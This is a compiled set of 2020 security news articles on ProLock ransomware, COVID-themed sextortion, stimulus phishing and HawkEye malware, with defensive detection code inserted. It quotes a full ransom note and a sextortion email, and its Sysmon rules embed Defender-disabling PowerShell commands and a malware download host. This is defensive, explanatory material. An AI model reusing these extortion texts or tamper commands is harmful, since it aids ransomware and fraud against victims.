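    if verbs == ["resize", "shadowstorage"] and any(
            a.lower().startswith("/maxsize=") for a in argv[3:]):
        return "shadow_resize"
    return None


def classify_file(path: str) -> Optional[str]:
    """Label created files that look like ProLock output."""
    name = _basename(path)
    if name.lower().endswith(ENCRYPTED_EXT):
        return "encrypted_file"
    if name.upper() == RANSOM_NOTE:
        return "ransom_note"
    return None


def summarize(events: List[str]) -> Dict[str, Counter]:
    """Count labelled behaviours per host; hosts with no hits are omitted."""
    per_host: Dict[str, Counter] = defaultdict(Counter)
    for line in events:
        kind, host, detail = line.split("|", 2)
        label = classify_vssadmin(detail) if kind == "proc" else classify_file(detail)
        if label:
            per_host[host][label] += 1
    return dict(per_host)


def alert_hosts(events: List[str]) -> List[str]:
    """Hosts showing shadow-copy removal together with encryption output."""
    hits = []
    for host, counts in sorted(summarize(events).items()):
        removed = counts["shadow_delete"] + counts["shadow_resize"]
        output = counts["encrypted_file"] + counts["ransom_note"]
        if removed and output:
            hits.append(host)
    return hits


if __name__ == "__main__":
    for host, counts in summarize(EVENTS).items():
        print(host, dict(counts))
    print("alert:", alert_hosts(EVENTS))
```

Shadow-copy removal on its own is noisy (backup agents do it too), which is why the alert requires the encryption artifacts on the same host.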
Each ProLock executable is hard-coded with a ransom amount assigned to a particular victim, and judging from the sample we analyzed, the ransom amounts continue to be high: this one demanded 80 bitcoins, or approximately $470,000.

ProLock Ransomware Tor Payment Site
Unfortunately, with this release the ransomware operators fixed their encryption flaw that made free decryption possible.

Victims will need to recover from backups instead or rebuild their files.

IOCS
Hashes:
WinMgr.bmp: a6ded68af5a6e5cc8c1adee029347ec72da3b10a439d98f79f4b15801abd7af0
Associated Files:
[HOW TO RECOVER FILES].TXT
C:\Programdata\WinMgr.xml
C:\Programdata\WinMgr.bmp
C:\Programdata\clean.bat
C:\Programdata\run.bat
ProLock Ransom Note:
Your files have been encrypted by ProLock Ransomware using RSA-2048 algorithm.

[.:Nothing personal just business:.]

No one can help you to restore files without our special decryption tool.

To get your files back you have to pay the decryption fee in BTC.
The final price depends on how fast you write to us.

1. Download TOR browser: https://www.torproject.org/
2. Install the TOR Browser.
3. Open the TOR Browser.
4. Open our website in the TOR browser: msaoyrayohnp32tcgwcanhjouetb5k54aekgnwg7dcvtgtecpumrxpqd.onion
5. Login using your ID xxx

***If you have any problems connecting or using TOR network:
contact our support by email chec1kyourf1les@protonmail.com.

[You'll receive instructions and price inside]

The decryption keys will be stored for 1 month.

We also have gathered your sensitive data.
We would share it in case you refuse to pay.

Decryption using third party software is impossible.
Attempts to self-decrypting files will result in the loss of your data.


Extortion Emails Threaten to Infect Your Family With Coronavirus
22.3.2020  Bleepingcomputer  Spam

Sextortion scammers are now also attempting to capitalize on the COVID-19 pandemic by threatening to infect their victims' families with the SARS-CoV-2 virus, on top of revealing all their "dirty secrets".

If you have received such an email, it is important to know that this is just a scam and that no hacker has stolen your passwords or can infect you or your family with an actual real-life virus.

Taking a closer look at their threats should be reason enough to dismiss their attempts at extortion and delete such emails immediately.

Sextortion emails were first seen in July 2018 when crooks started emailing potential victims and claiming that they have them recorded on video while they were browsing adult sites.

To increase their scam's credibility, the scammers also include the victims' passwords in some cases, leaked together with their email addresses as part of a previous data breach.

Coronavirus infection threats over email
The sextortion emails' subjects are in the "[YOUR NAME] : [YOUR PASSWORD]" form, presenting one of your passwords from the get-go as a proven tactic to catch the targets' attention and make them open the messages.

Next, the scammers attempt to send their victims into full panic mode by warning them that they know where they live, as well as "every dirty little secret" in their lives that will be exposed if $4,000 worth of bitcoins is not paid within 24 hours.

These threats are also supplemented with the promise of infecting the target's entire family with the coronavirus as researchers at Sophos found.

Unfortunately for them, this is the part that absolutely ruins all their previous work at intimidating the victim given the laughable attempt to use a real-life coronavirus infection scare to incentivize their victims to pay a ransom over email.

"You hαve 24 hours τo maκe the ραyment. Ι hαve a unique pιxel withιn τhis email messαge, and rιght now, I κηοw thατ yοu hαve reαd thιs email," the crooks add.

Sextortion email (ExecuteMalware)
Below you can find the full content of such an 'innovative' sextortion email as published by Sophos:

Subject: [YOUR NAME] : [YOUR PASSWORD]

I know every dιrτy liττle secreτ abοuτ your lιfe. To ρrove my poιnτ, tell me, does [REDACTED] ring αny bell το yοu? It was οηe οf yοur pαsswοrds.

Whαt dο Ι κnow αbοuτ you?

Tο sταrt with, I κηοw all of yοur passwords. I αm awαre of your whereαbοuτs, what yοu eaτ, wιth whοm you tαlk, every liττle τhing yοu do in α day.

What αm Ι cαpable οf dοιηg?

Ιf I wαηt, I cοuld eνen infect yοur whοle fαmily with τhe CοronαVirus, reνeαl all of yοur secrets. There αre cοunτless τhiηgs I cαn dο.

Whατ should yοu do?

Yοu need tο ραy me $4000. You'll mαke τhe ρayment viα Βiτcoiη τo the belοw-mentιοηed αddress. Ιf you dοn't knοw how tο do τhis, seαrch 'how tο buy bιτcoin' in Goοgle.
Βitcoin Address:
[REDACTED]
(Ιt is cAsE sensiτiνe, sο cοpy αηd ραste it)

You hαve 24 hours τo maκe the ραyment. Ι hαve a unique pιxel withιn τhis email messαge, and rιght now, I κηοw thατ yοu hαve reαd thιs email.

If I dο ηoτ geτ the paymenτ:

Ι wιll iηfect eνery member οf your family with τhe CοronαVιrus. No matter how smart yοu αre, belieνe me, ιf Ι waητ to αffect, Ι caη. Ι will also gο αheαd aηd reνeαl yοur secreτs. Ι will comρletely ruiη yοur lιfe.

Nonetheless, ιf I do geτ ραιd, Ι wιll erαse every lιτtle informατιοη I have αbοut yοu immediατely. You will never hear from me αgαιn. It ιs a nοn-ηegotιαble οffer, sο dοn't wαsτe my τιme αnd yours by reρlyiηg to thιs emαil.

Nikita
The scammers also attempt to bypass text matching email protection features by using Greek characters instead of Latin ones as seen above.
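A normalization step for that evasion, added here as an example and not code from the article or from Sophos: it maps the Greek look-alikes back to Latin so keyword filters match again, and counts words that mix the two scripts as a signal in itself. The confusables table, keyword list and sample line are constructed for the demonstration.

```python
"""Normalize Greek-for-Latin homoglyphs before keyword matching.

Added example, not code from the article or from Sophos: the sextortion
mail above swaps Latin letters for Greek look-alikes so that plain text
filters miss words such as "payment" and "bitcoin". Mapping the
confusables back to Latin gives the filter matchable text, and the number
of words that mix scripts is a signal in its own right. The confusables
table, keyword list and sample sentence are constructed for the
demonstration.
"""
import re
import unicodedata

# Greek letters that pass for Latin ones at a glance (constructed table:
# it covers the substitutions seen in the email, not every confusable).
GREEK_TO_LATIN = {
    "\u03b1": "a",  # alpha
    "\u03b5": "e",  # epsilon
    "\u03b7": "n",  # eta
    "\u03b9": "i",  # iota
    "\u03ba": "k",  # kappa
    "\u03bd": "v",  # nu
    "\u03bf": "o",  # omicron
    "\u03c1": "p",  # rho
    "\u03c4": "t",  # tau
    "\u03c5": "u",  # upsilon
    "\u0391": "A",  # capital alpha
    "\u0392": "B",  # capital beta
    "\u0395": "E",  # capital epsilon
    "\u0397": "H",  # capital eta
    "\u0399": "I",  # capital iota
    "\u039a": "K",  # capital kappa
    "\u039c": "M",  # capital mu
    "\u039d": "N",  # capital nu
    "\u039f": "O",  # capital omicron
    "\u03a1": "P",  # capital rho
    "\u03a4": "T",  # capital tau
    "\u03a5": "Y",  # capital upsilon
    "\u03a7": "X",  # capital chi
}
_TRANSLATION = str.maketrans(GREEK_TO_LATIN)

# Phrases worth matching once the text is back in Latin letters.
KEYWORDS = ("bitcoin", "payment", "24 hours", "password", "secret")

# One line of the email above with the same substitutions, written with
# escapes so the Greek letters are unambiguous (constructed sample).
SAMPLE = ("Y\u03bfu need t\u03bf \u03c1\u03b1y me $4000. You'll m\u03b1ke \u03c4he "
          "\u03c1ayment vi\u03b1 \u0392i\u03c4coi\u03b7 \u03c4o the "
          "bel\u03bfw-ment\u03b9\u03bf\u03b7ed \u03b1ddress.")


def _is_greek(ch: str) -> bool:
    return unicodedata.name(ch, "").startswith("GREEK")


def normalize_homoglyphs(text: str) -> str:
    """Replace each confusable Greek letter with its Latin look-alike."""
    return text.translate(_TRANSLATION)


def mixed_script_words(text: str) -> list:
    """Words that contain both ASCII Latin letters and Greek letters.

    A genuine Greek-language mail has Greek-only words; a homoglyph
    attack produces words that mix the two scripts.
    """
    mixed = []
    for token in re.findall(r"\S+", text):
        letters = [c for c in token if c.isalpha()]
        if any(c.isascii() for c in letters) and any(_is_greek(c) for c in letters):
            mixed.append(token)
    return mixed


def score_message(text: str) -> dict:
    """Normalize, then report mixed-script words and keyword hits."""
    normalized = normalize_homoglyphs(text)
    lowered = normalized.lower()
    return {
        "normalized": normalized,
        "mixed_script_words": len(mixed_script_words(text)),
        "keyword_hits": [k for k in KEYWORDS if k in lowered],
    }


if __name__ == "__main__":
    result = score_message(SAMPLE)
    print(result["normalized"])
    print("mixed-script words:", result["mixed_script_words"],
          "keyword hits:", result["keyword_hits"])
```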

What's important to remember if you are on the receiving end of an anxiety-inducing campaign is that, despite all their threats, the scammers never gained access to any of your accounts and you have absolutely nothing to worry about.

Additionally, there is no chance in hell that they will ever be able to get close to you or your family, and the chances of their coronavirus infection threats ever materializing are even slimmer.

Instead of being alarmed by such gratuitous threats, you should mark such emails as spam as soon as you receive them; this helps your email service detect them before they land in your inbox and block them automatically in the future.


YouTube and Amazon Also Lowering Video Quality in Europe
22.3.2020  Bleepingcomputer  IT

Following in the footsteps of Netflix, Amazon and YouTube have also agreed to lower the video streaming quality of their services to prevent European network infrastructure from becoming overburdened.

With people increasingly turning to the Internet for entertainment and information during the Coronavirus pandemic, the European Union has asked that streaming providers reduce the quality of their videos to standard definition (SD) to reduce the burden on Internet infrastructure.

"As a result of social distancing measures put in place across Europe to fight the Coronavirus pandemic, the demand for Internet capacity has increased, be it for teleworking, e-learning or entertainment purposes. This could put networks under strain at a moment when they need to be operational at the best possible level. In order to prevent congestion and to ensure the open Internet, Internal Market Commissioner Thierry Breton has called on the responsibility of streaming services, operators and users. Streaming platforms are advised to offer standard rather than high definition and to cooperate with telecom operators."

Yesterday, Netflix agreed to lower the bit rate of their streaming videos by 25% for the next 30 days.

Today, both Amazon and Google stated that they would also reduce the quality of streaming videos for their platforms as well.

"We support the need for careful management of telecom services to ensure they can handle the increased internet demand with so many people now at home full-time due to COVID-19. Prime Video is working with local authorities and Internet Service Providers where needed to help mitigate any network congestion, including in Europe where we’ve already begun the effort to reduce streaming bitrates whilst maintaining a quality streaming experience for our customers," a Prime Video spokesperson told BleepingComputer.

In a statement to Reuters, Google has also stated that they will reduce the quality of YouTube video to SD in or

"We are making a commitment to temporarily switch all traffic in the EU to standard definition by default," Google told Reuters.

While Netflix has stated that they plan to reduce the quality for only 30 days, there is a good chance that this reduction in quality will last longer if necessary.


Audible Stories Give Parents a Break With Free Audio Books for Children
22.3.2020  Bleepingcomputer  IT

Audible has launched a new service called Audible Stories where children and teenagers can listen to a huge selection of stories in six different languages for free.

With the launch of their new service, Audible Stories says these audiobooks will be free for as long as school is out to help continue learning and take a break from these stressful times.

"For as long as schools are closed, we're open. Starting today, kids everywhere can instantly stream an incredible collection of stories, including titles across six different languages, that will help them continue dreaming, learning, and just being kids," Audible Stories states on their home page.

Included in this offer is a wide range of books ranging from elementary school stories to classic stories for teenagers in high school.

Some of the books available on Audible Stories
The available audiobooks range from classics such as Winnie-the-Pooh and Stone Soup for younger kids to White Fang, The Call of the Wild, Brave New World, and Roots for older ones.

With school out, these free audiobooks come at a great time as they not only can be fun to listen to for the whole family but can also give parents a break to get some work done.


FBI Warning: Phishing Emails Push Fake Govt Stimulus Checks
22.3.2020  Bleepingcomputer  Phishing

The FBI's Internet Crime Complaint Center (IC3) today warned of an ongoing phishing campaign delivering spam that uses fake government economic stimulus checks as bait to steal personal information from potential victims.

"Look out for phishing emails asking you to verify your personal information in order to receive an economic stimulus check from the government," IC3's alert says.

"While talk of economic stimulus checks has been in the news cycle, government agencies are not sending unsolicited emails seeking your private information in order to send you money."

The FBI issued another warning about a phishing scam impersonating the Internal Revenue Service (IRS) in 2008 that tried to steal taxpayers' personal information using economic stimulus checks as bait.

CDC and WHO impersonators exploit the COVID-19 pandemic
Similar campaigns might also ask potential victims for donations to various charities, promise general financial relief and airline carrier refunds, as well as try to push fake COVID-19 cures, vaccines, and testing kits.

Other active phishing attacks are also taking advantage of the COVID-19 pandemic to infect victims with malware and harvest their personal info via spam impersonating the Centers for Disease Control and Prevention (CDC) and other similar organizations like the World Health Organization (WHO).

The FBI also says that scammers are trying to sell products claiming to prevent, treat, diagnose, or cure the COVID-19 disease, as well as counterfeit sanitizing products and personal protective equipment (PPE), including but not limited to N95 respirator masks, gloves, protective gowns, goggles, and full-face shields.

Possible types of COVID-19-themed scams and attacks as highlighted by U.S. Attorney Andrew Murray:

• Individuals or businesses selling fake cures for COVID-19.
• Online offers for vaccinations and test kits.
• Phishing emails or texts from entities posing as the World Health Organization (WHO) or the Centers for Disease Control and Prevention (CDC).
• Malware inserted in mobile apps designed to track the spread of COVID-19 that can steal information stored on devices.
• Malicious COVID-19 websites and apps that can gain and lock access to devices until a ransom payment is made.
• Solicitations for donations to fake charities or crowdfunding sites.

Phishing and scam defense
To avoid getting scammed by fraudsters, infected with malware, or having your personal information stolen, IC3 recommends not clicking on links or opening attachments sent by people you don't know, and always making sure that the websites you visit are legitimate by typing their address into the browser instead of clicking hyperlinks.

You should also never provide sensitive information like user credentials, social security numbers, or financial data when asked over email or as part of a robocall.

To make it easier to spot phishing and scam attempts, you can also check the domain of websites you visit for misspellings or for the wrong top-level domain (TLD) at the end of the site's URL — .com or .net instead of .gov, the sponsored top-level domain (sTLD) used by US government sites.

Microsoft today also shared a list of measures to protect against coronavirus-themed phishing attacks, including keeping software up to date, using an anti-malware solution and an email service with phishing protection, as well as enabling multi-factor authentication (MFA) on all accounts.

U.S. attorneys and federal prosecutors fight COVID-19 fraud
The FBI was joined this week by the Federal Trade Commission (FTC) and by attorneys general and federal prosecutors (1, 2, 3, 4, 5, 6) across the US in investigating and fighting coronavirus-themed phishing and scams.

They have issued warnings of increased malicious activity attempting to capitalize on the COVID-19 outbreak to infect people's devices with malware, steal their sensitive info, and scam them.

"In a time of high stress and fear it is critical for the public to know that law enforcement at all levels remains dedicated to protecting them from harm – whether it is from scams, frauds or violent crime," U.S. Attorney Brian T. Moran said.

"As Attorney General Barr has directed, we will remain vigilant in detecting, investigating and prosecuting wrongdoing related to the crisis. To those who are engaged in perpetrating these schemes, you are on notice that my office will aggressively pursue you and hold you to answer for preying on our communities."

"The pandemic is dangerous enough without wrongdoers seeking to profit from public panic and this sort of conduct cannot be tolerated," Attorney General William Barr added in a communication to the U.S. attorneys.

U.S. Attorneys all over the states have also announced the appointment of federal prosecutors to coordinate and lead investigations and prosecutions of fraudsters trying to take advantage of people during the COVID-19 pandemic.

The European Commission, CERT-EU, ENISA, and Europol have also issued a statement today (1, 2, 3) about a joint mission to track and defend remote workers from coronavirus-themed malicious activities.

Coronavirus cure scams can be reported to the Federal Trade Commission (FTC) at https://www.ftccomplaintassistant.gov and any other suspicious activity, fraud, or attempted fraud to the FBI’s Internet Crime Complaint Center at https://www.ic3.gov.


Firefox Reenables Insecure TLS to Improve Access to COVID19 Info
22.3.2020  Bleepingcomputer  Safety

Mozilla says that support for the insecure TLS 1.0 and TLS 1.1 protocols will be reenabled in the latest version of Firefox to maintain access to government sites with COVID19 information that haven't yet upgraded to TLS 1.2 or TLS 1.3.

"We reverted the change for an undetermined amount of time to better enable access to critical government sites sharing COVID19 information," Mozilla said today in an update to the Firefox 74.0 release notes.

Plans to remove TLS
TLS 1.0 and TLS 1.1 support was dropped with the release of Firefox 74.0 on March 10 to improve the security of website connections, with sites that don't support TLS 1.2 or TLS 1.3 showing a "Secure connection failed" error page instead of their contents, along with an override 'Enable TLS 1.0 and 1.1' button for that website's connection.

In October 2018, all major browser makers including Microsoft, Google, Apple, and Mozilla announced the retirement of the TLS 1.0 and TLS 1.1 protocols released over a decade ago.

With more than 97% of the sites surveyed by Qualys SSL Labs supporting TLS 1.2 and TLS 1.3, the decision to retire the two protocols in favor of the newer and better supported TLS 1.2 and TLS 1.3 is logical, as they provide a more secure path moving forward.

97% of surveyed sites support TLS 1.2 and 1.3 (Qualys SSL Labs)
According to TLS 1.0 and TLS 1.1 usage statistics at the time, the vast majority of users were no longer using these protocols:

Google reported that only 0.5% of HTTPS connections made by Chrome are using TLS 1.0 or TLS 1.1
Apple reported that on their platforms less than 0.36% of HTTPS connections made by Safari are using TLS 1.0 or TLS 1.1.
Microsoft said that only 0.72% of secure connections made by Edge use TLS 1.0 or 1.1.
Firefox had the largest amount of connections, with 1.2% of all connections using TLS 1.0 or 1.1.
Hundreds of thousands of sites still rely on TLS 1.0 and TLS 1.1
Despite this, as Netcraft reported at the beginning of March 2020, over 850,000 websites are still using the outdated and insecure TLS 1.0 and TLS 1.1 protocols that expose users to a wide range of cryptographic attacks (1, 2) leading to their web traffic being decrypted by attackers.

"The use of TLS 1.0 on e-commerce websites as a measure for protecting user data has been forbidden by the Payment Card Industry Data Security Standard since June 2018, and many websites have already migrated," as Netcraft said.

However, seeing that Mozilla decided to bring back support for the two previously retired TLS protocols, there are evidently enough government sites sharing information on the current coronavirus pandemic over them to warrant a reversal of the removal decision.


Microsoft Shares Sneak Peek of Upcoming Windows 10 Features
22.3.2020  Bleepingcomputer  OS

Microsoft's Chief Product Officer for Windows & Devices Panos Panay has posted a Windows 10 video that offers us a sneak peek at some of the new and upcoming features coming to Windows 10.

In an Instagram video posted yesterday, Panos offers a glimpse of some of these features including a look at the new Fluent system icons, an updated File Explorer, a new context menu, and a redesigned Start Menu.

While the video does not offer us high-quality glimpses of the upcoming features, it does let us get a general idea of what they will be offering.

It is not known when these new features will be coming, but Windows 10 Insiders will probably get a crack at them sooner than everyone else.

New Fluent Icons
Microsoft has already started rolling out its new Fluent-based system icons for Windows 10 that add more color and depth to the icons associated with popular programs.

New Fluent Icons
New context menus add shortcuts
A new context menu was shown that offers shortcuts to the previous screen, the Address Bar, to Tabs, and the ability to add a New Tab. Does this mean the Windows 10 Sets feature may make an appearance?

New 'Go Back' Context Menu
New Windows 10 File Explorer
We also saw an updated File Explorer showing more elegant icons and a new redesigned interface. This new interface appears to do away with the address bar, but I am hopeful we will be able to display it if we choose.

We also see OneDrive integration, removable media accessible outside of 'This PC', and of particular interest, Google Drive integration.

New Windows 10 File Explorer
New Windows 10 Start Menu
Microsoft also gave us another glimpse of their upcoming Windows 10 Start Menu that utilizes the new Fluent icons and transparent background to make the icons stand out more.

New Windows 10 Start Menu


Rogers Data Breach Exposed Customer Info in Unsecured Database
22.3.2020  Bleepingcomputer  Incident

Canadian ISP Rogers Communications has begun to notify customers of a data breach that exposed their personal information due to an unsecured database.

In a data breach notification posted to their site, Rogers states that they learned on February 26th, 2020 that a vendor database containing customer information was unsecured and publicly exposed to the Internet.

"On February 26, 2020, Rogers became aware that one of our external service providers had inadvertently made information available online that provided access to a database managed by that service provider. We immediately made sure the information was removed and began an investigation to see how many customers might have been impacted. No credit card, no banking, or no password information was exposed. We are directly contacting any customer whose information was in the database. We sincerely apologize for this incident and regret any inconvenience this may cause," Rogers explained.

The following customer information was exposed by this data breach:

address
account number
email address
telephone number
Rogers' support article states that no credit card, banking, or password information was exposed by the database.

For affected customers, Rogers is providing a complimentary Transunion credit monitoring subscription.

As some of the exposed information was mobile numbers, Rogers has also added port protection to the numbers to block them from being ported to another carrier without authorization.

"Some wireless account numbers were included in the vendor database. If a customer’s wireless account number was included, we added a block to their account (called port protection) to prevent their phone number from being transferred to another carrier without their authorization. Customers can call us if they wish to remove this block."

All customers impacted by this data breach should be on the lookout for targeted phishing scams. These phishing scams could pretend to be from Rogers or use the accessed information to gain your information at other companies.


WHO Chief Impersonated in Phishing to Deliver HawkEye Malware
22.3.2020  Bleepingcomputer  Phishing  Virus

An ongoing phishing campaign delivering emails posing as official messages from the Director-General of the World Health Organization (WHO) is actively spreading HawkEye malware payloads onto the devices of unsuspecting victims.

According to researchers at IBM X-Force Threat Intelligence, who spotted it, the spam campaign started today and has already delivered several waves of emails attempting to pass as messages from WHO.

"HawkEye is designed to steal information from infected devices, but it can also be used as a loader, leveraging its botnets to fetch other malware into the device as a service for third-party cybercrime actors," IBM X-Force's research team previously said.

Malspam promising coronavirus prevention and cure instructions
The emails come with archive attachments containing a Coronavirus Disease (Covid-19) CURE.exe executable described by the attackers as a "file with the instructions on common drugs to take for prevention and fast cure to this deadly virus called Coronavirus Disease (COVID-19)."

"This is an instruction from WHO (World Health Organization) to help figth against coronavirus," the phishing emails also add.

The targets are also asked to review the attached file and follow the enclosed instructions, as well as forward it to family and friends to share the "instructions" needed to fight the virus.

Phishing email sample (IBM X-Force)
"These emails claiming to be from the World Health Organization are being delivered personalized by addressing the recipient by a username stripped out of the email address," IBM X-Force researchers found.

However, instead of coronavirus drug advice, the executable is actually a HawkEye keylogger loader with anti-VM and anti-sandbox capabilities that will attempt to turn off Windows Defender via the registry and to disable scans and updates using PowerShell.

Attempting to turn off Windows Defender (IBM X-Force)
Collects and exfiltrates credentials and keystrokes
The final HawkEye payload, an executable named GqPOcUdjXrGtqjINREXuj.exe, is loaded from the resource section of a Bitmap image and injected using Process Hollowing.

The HawkEye sample analyzed by IBM X-Force is capable of capturing keystrokes on infected devices, but it can also capture screenshots and steal user credentials from a wide range of applications and from the system clipboard.

The malware will harvest credentials from web browsers and email clients such as Firefox, Thunderbird, Postbox, SeaMonkey, WaterFox, PaleMoon, and more. All the data it collects is encrypted and sent to its operators by email via the SMTP protocol.

"The sample can download other malware from http://ypsmKO[.]com, the downloaded malware will be saved at %temp%\Svf," the researchers add.

"The malware's configuration data and other important settings such as the SMTP server, email address, and password used are AES encrypted and stored in an array."
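The Defender tampering described above and the %temp%\Svf download location quoted by the researchers are the kind of host behaviour a SOC would want to alert on. The following is an added detection example, not code from IBM X-Force or from this article: it runs three simple rules over constructed Sysmon-style events (event IDs 1, 11 and 13 for process create, file create and registry value set are assumed; the Defender policy key path `HKLM\SOFTWARE\Policies\Microsoft\Windows Defender` and the `Set-MpPreference` cmdlet are real Windows names, while the victim paths and the benign noise events are sample data).

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed telemetry in a Sysmon-like shape (assumption: event_id 1 = process
# create, 11 = file create, 13 = registry value set). The executable name and the
# %temp%\Svf path echo the campaign; everything else is sample data.
CURE_EXE = r"C:\Users\victim\AppData\Local\Temp\Coronavirus Disease (Covid-19) CURE.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS: List[Dict] = [
    {"event_id": 13, "image": CURE_EXE,
     "target_object": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware",
     "details": "DWORD (0x00000001)"},
    {"event_id": 1, "image": POWERSHELL, "parent_image": CURE_EXE,
     "command_line": "powershell.exe -nop -w hidden Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"event_id": 11, "image": CURE_EXE,
     "target_filename": r"C:\Users\victim\AppData\Local\Temp\Svf"},
    # Benign noise: Defender's own engine writing under its non-policy key, and a
    # read-only PowerShell query. Neither should fire.
    {"event_id": 13, "image": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "target_object": r"HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates\SignatureUpdateLastAttempted",
     "details": "QWORD (0x01d5f9c4-0x2b3a1f00)"},
    {"event_id": 1, "image": POWERSHELL, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe Get-MpPreference"},
]

# Policy values named Disable* under this key switch Defender features off when set to 1.
DEFENDER_POLICY_KEY = "hklm\\software\\policies\\microsoft\\windows defender\\"
DISABLE_VALUE_RE = re.compile(r"\\disable[a-z]+$")
# Set-MpPreference with any -Disable<Feature> $true switch.
SET_MPPREF_RE = re.compile(r"\bset-mppreference\b.*-disable[a-z]+\s+\$true", re.IGNORECASE)
# Second-stage download path quoted in the research (%temp%\Svf).
DROP_PATH_RE = re.compile(r"\\temp\\svf$", re.IGNORECASE)


@dataclass
class Finding:
    rule: str
    image: str      # process that produced the event
    evidence: str   # registry path, command line or file path that matched


def _dword_value(details: str) -> Optional[int]:
    """Extract the integer from Sysmon's 'DWORD (0x00000001)' rendering."""
    m = re.search(r"dword \(0x([0-9a-f]+)\)", details, re.IGNORECASE)
    return int(m.group(1), 16) if m else None


def rule_defender_policy_disabled(ev: Dict) -> Optional[Finding]:
    """Registry value set: a Disable* value under the Defender policy key set to 1."""
    if ev.get("event_id") != 13:
        return None
    target = ev.get("target_object", "")
    low = target.lower()
    if not low.startswith(DEFENDER_POLICY_KEY) or not DISABLE_VALUE_RE.search(low):
        return None
    if _dword_value(ev.get("details", "")) != 1:
        return None
    return Finding("defender_disabled_via_registry_policy", ev.get("image", ""), target)


def rule_set_mppreference_disable(ev: Dict) -> Optional[Finding]:
    """Process create: PowerShell turning a Defender feature off via Set-MpPreference."""
    if ev.get("event_id") != 1:
        return None
    cmd = ev.get("command_line", "")
    if not SET_MPPREF_RE.search(cmd):
        return None
    return Finding("defender_disabled_via_powershell", ev.get("image", ""), cmd)


def rule_hawkeye_drop_path(ev: Dict) -> Optional[Finding]:
    """File create: something written to the %temp%\\Svf path named in the research."""
    if ev.get("event_id") != 11:
        return None
    path = ev.get("target_filename", "")
    if not DROP_PATH_RE.search(path):
        return None
    return Finding("hawkeye_download_path", ev.get("image", ""), path)


RULES = [rule_defender_policy_disabled, rule_set_mppreference_disable, rule_hawkeye_drop_path]


def scan(events: List[Dict]) -> List[Finding]:
    """Apply every rule to every event and collect the matches."""
    findings: List[Finding] = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


def rule_names(events: List[Dict]) -> List[str]:
    """Distinct rule names that fired, sorted, for quick triage."""
    return sorted({f.rule for f in scan(events)})


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.image} -> {f.evidence}")
```

The registry rule keys on the policy branch rather than on Defender's own configuration branch, so the engine updating its signature timestamps does not trip it; in production you would also want to alert when the writing process is not a management tool (Group Policy, Intune or an admin's console) and is running from a user-writable directory such as %TEMP%, as in the first sample event.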

In December 2019, HawkEye ranked seventh in the top 10 of the most prevalent threats in 2019 based on the number of samples uploaded to the interactive malware analysis platform Any.Run.

ANY.RUN
@anyrun_app
📊 Annual TOP10 threats by uploads to ANYRUN!

1⃣ #Emotet 36026 🔥
2⃣ #AgentTesla 10324
3⃣ #NanoCore 6527
4⃣ #LokiBot 5693
5⃣ #Ursnif 4185
6⃣ #FormBook 3548
7⃣ #HawkEye 3388
8⃣ #AZORult 2898
9⃣ #TrickBot 2510
🔟 #njRAT 2355
https://any.run/malware-reports/ …

8:03 AM - Dec 23, 2019
Previous HawkEye campaigns
The HawkEye information-stealing malware (also known as Predator Pain) has been used by threat actors to infect victims and sold on dark web markets and hacking forums since at least 2013.

HawkEye's developers regularly update the malware with fixes and new capabilities and advertise it as a system monitoring solution with data exfiltration features.

Attackers have previously targeted businesses on a worldwide scale with the HawkEye malware in two malspam campaigns running in April and May 2019.

They used Estonian spam servers to deliver malicious spam emails disguised as messages from Spanish banks or legitimate companies and distributing both HawkEye Reborn v8.0 and HawkEye Reborn v9.0.

"Recent changes in both the ownership and development efforts of the HawkEye Reborn keylogger/stealer demonstrate that this is a threat that will continue to experience ongoing development and improvement moving forward," said Cisco Talos about the HawkEye Reborn v9 malware.

"HawkEye has been active across the threat landscape for a long time and will likely continue to be leveraged in the future as long as the developer of this kit can monetize their efforts."


Sodinokibi Ransomware Data Leaks Now Sold on Hacker Forums
22
.3.2020  Bleepingcomputer  Ransomware

Ransomware victims who do not pay a ransom and have their stolen files leaked are now facing a bigger nightmare as other hackers and criminals sell and distribute the released files on hacker forums.

In 2019, the Maze Ransomware operators began stealing data from victims before encrypting devices and using the stolen files as leverage to get the victims to pay. If the victim decided not to pay, the Maze operators would then publish the files.

Since then, other ransomware operators such as Sodinokibi, DoppelPaymer, and Nemty have begun the same practice of using stolen files as leverage.

Recently, the Sodinokibi Ransomware operators published over 12 GB of stolen data allegedly belonging to a company named Brooks International for not paying the ransom.

Sodinokibi Ransomware leaking data
While making the data publicly accessible is bad enough, BleepingComputer has been told by cyber-intelligence firm Cyble that other hackers and criminals have started to distribute and sell this data on hacker forums.

For example, the following image is a hacker forum post where a member is selling a link to the stolen data for 8 credits, which is worth approximately 2 Euros.

Hacker forum post selling the data
From screenshots of the files shared with BleepingComputer, this stolen data is very valuable to hackers as it contains user names and passwords, credit card statements, alleged tax information, and much more.

Based on the comments from hackers who purchased the link to this data, they are also finding the data valuable.

"It even has credit card number & a password. lol !!"

"Too bad these W2 forms weren't Donald Trump's taxes. lol !!"

"Thank you for being the hero we may not deserve, but need."

BleepingComputer reached out to Brooks International by phone to warn them about the distribution of their data and to ask related questions, but after speaking to someone, never received a call back.

Ransomware attacks are data breaches
For a long time, BleepingComputer has been stating that ransomware attacks are data breaches, as it has been a widely known secret that attackers sifted through their victims' files before encrypting them.

Now that they are also stealing and publishing these files for non-payment, there is no longer any doubt that these attacks need to be classified as data breaches.

To make matters worse, it is not only corporate data being exposed, but also employees' personal information being stolen. These employees need to be informed of these breaches so that they can protect themselves from identity theft.

Unfortunately, too many ransomware attacks go undisclosed, even to the employees who are impacted.


Netflix Reduces Video Quality in Europe by 25% to Lower Load
22
.3.2020  Bleepingcomputer  IT

Netflix is reducing the quality of its streamed shows and movies in Europe for the next 30 days to reduce congestion on Internet infrastructure.

With European countries on national lockdowns, mandated curfews, and people performing social-isolation during the pandemic, the EU commission has been concerned that the increased video streaming would overburden Internet infrastructure.

